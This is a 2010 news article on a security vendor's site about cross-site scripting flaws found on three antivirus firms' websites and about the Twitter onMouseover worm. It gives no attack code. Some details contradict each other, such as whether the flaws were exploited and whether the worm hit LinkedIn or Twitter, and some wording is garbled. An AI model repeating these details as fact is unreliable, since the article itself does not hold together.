Protect your corporate IT network from hackers and other unwanted intruders with Proxy Sentinel™. Click here for all the details and get the peace of mind you deserve.
Back to our Homepage Proxy Sentinel™ high performance Internet proxy server and secure firewall solution Firewall Sentinel™ secure & powerful Internet firewall solution About Internet and GCIS Frequently Asked Questions on Internet security issues Internet Security Industry News - Stay informed of what's happening Contact Internet today and order your Proxy Sentinel™ or Firewall Sentinel™ server now!

Three anti-virus firms plug security holes on their own websites

Add to     Digg this story Digg this

October 4, 2010

Internet security observers have uncovered critical security vulnerabilities on the Web sites of three anti-virus companies that managed to create a full-fledge phishing risk from the sites themselves.

Overall, cross-site scripting (XSS) security flaws of varying severity were found on the sites of Symantec, Eset and Panda Security by Team Elite, a team of so-called 'white-hat' hackers who discovered the holes.

A spokesperson from Team Elite said "We notified all three companies of these security flaws and all three responded by fixing them in good time."

A few cross-site XSS security holes on LinkedIn's website were exploited by the infamous onMouseover worm recently. Twitter's website was also hacked lately, as well as Facebook. The XSS security holes on the 3 anti-virus firms' websites weren't exploited and no harm was done, however.

Nevertheless, both Symantec, Eset and Panda Security should all be especially vigilant in setting a good example in the field of Internet security. After all, that's the field they operate in: security!

But time and experience show that cross-scripting XSS problems are commonplace even-- in the information security vendor market.

And because such groups such as Team Elite go looking for them in the first place, these security issues regularly get a public airing, and that's perfectly understandable.

Even though there's some evidence of miscreants exploiting these security vulnerabilities, that's no reason to dismiss them, as one Team Elite member said.

Software coding errors that give rise to cross-site scripting holes are endemic in Web development, and the trend appears to be on the rise over the past year. For instance, this class of vulnerability might allow a potential hacker to present content from third-party sites (pop-ups, malicious scripts, etc.) as if it came from a site an Internet surfer was trying to visit.

So as a net cumulative effect, such security flaws are handy for phishing attacks that attempt to dupe the unsuspecting Internet user into handing over their credentials to untrusted sites.

A cross-site XSS security risk is a high level vulnerability which could allow an attacker to steal sensitive information such as user ID and password information and other sensitive logen credentials. I can assure you that our team doesn't do such things, and we don't hack any websites. We simply deliver the proof of concept, spread the knowledge of existing security vulnerabilities so that the companies can correct those flaws themselves and for the benefit of the whole Internet community," said the Team Elite spokesperson.

"We've since noticed that all three security vendors have fixed the XSS security flaws on their own Web sites, which is certainly a good development," he added.

Besides security vendor sites, it's becoming apparent now that on average, social sites aren't secure either, and these latest security flaws being discovered are troubling. And if it isn't security bugs, it's privacy issues that users seem to be facing more and more these days.

So now some users are asking: is all of this really worth it? Am I wasting my time and energy on something that isn't worth considering, given all the security issues.

Twitter's site revamp - which reintroduced a security flaw that meant JavaScript could be injected into Tweets - was unrelated to the recent introduction of the New Twitter the company claims. The cross-site scripting flaw meant JavaScript code was run when users simply rolled their mouse over a link.

But wait-- it even gets worse.

The security flaw was mostly used for mischief but there were incidents of porn and shock site redirects as well, Internet security researchers say. A worm, without a malicious payload, took advantage of the vulnerability to cause users to retweet their original Tweets after they rolled their mouse over a link, and then creating hundreds of thousands of spam message in the process, on top of creating other issues.

Only surfers using were exposed to the vulnerability. Third party clients were unaffected, at least for now. We will keep you updated however, if the situation should change.

A Japanese Web application developer called Masato Kinugawa is credited with discovering the security hole in August and used it to post multi-coloured rainbow tweets. Then, Scandinavian app developer Magnus Holm developed at least one of the "worms" that took advantage of the security vulnerability.

Holm created the worm to test what was possible, but not expecting much that his creation would spread so quickly either. In fact he was astonished at the speed the exploit was travelling at.

For its part, Twitter said that while the attack created a huge amount of spam and confusion, no greater security threat was posed and users of compromised accounts need not change their passwords.

However, both Kinugawa and Holm all disagree on Twitter's comments, and some say Twitter isn't proactive enough in the matter.

Up to 500,000 users (about 100 per second) may have fallen victim to the cross site scripting attack, according to an analysis by Kaspersky Labs. And other similar security firms agree.

"Overall, there is no need to change passwords because user account information wasn't compromised through this exploit," Twitter has reassured users in a blog post written after the security breach.

Add to     Digg this story Digg this

Source: Team Elite.

Save Internet's URL to the list of your favorite web sites in your Web browser by clicking here.

You can link to the Internet Security web site as much as you like.

| Home | Proxy Sentinel™ | Firewall Sentinel™ | FAQ | News | Sitemap | Contact |
Copyright © Internet    Terms of use    Privacy agreement    Legal disclaimer

Get your Linux or Windows dedicated server today.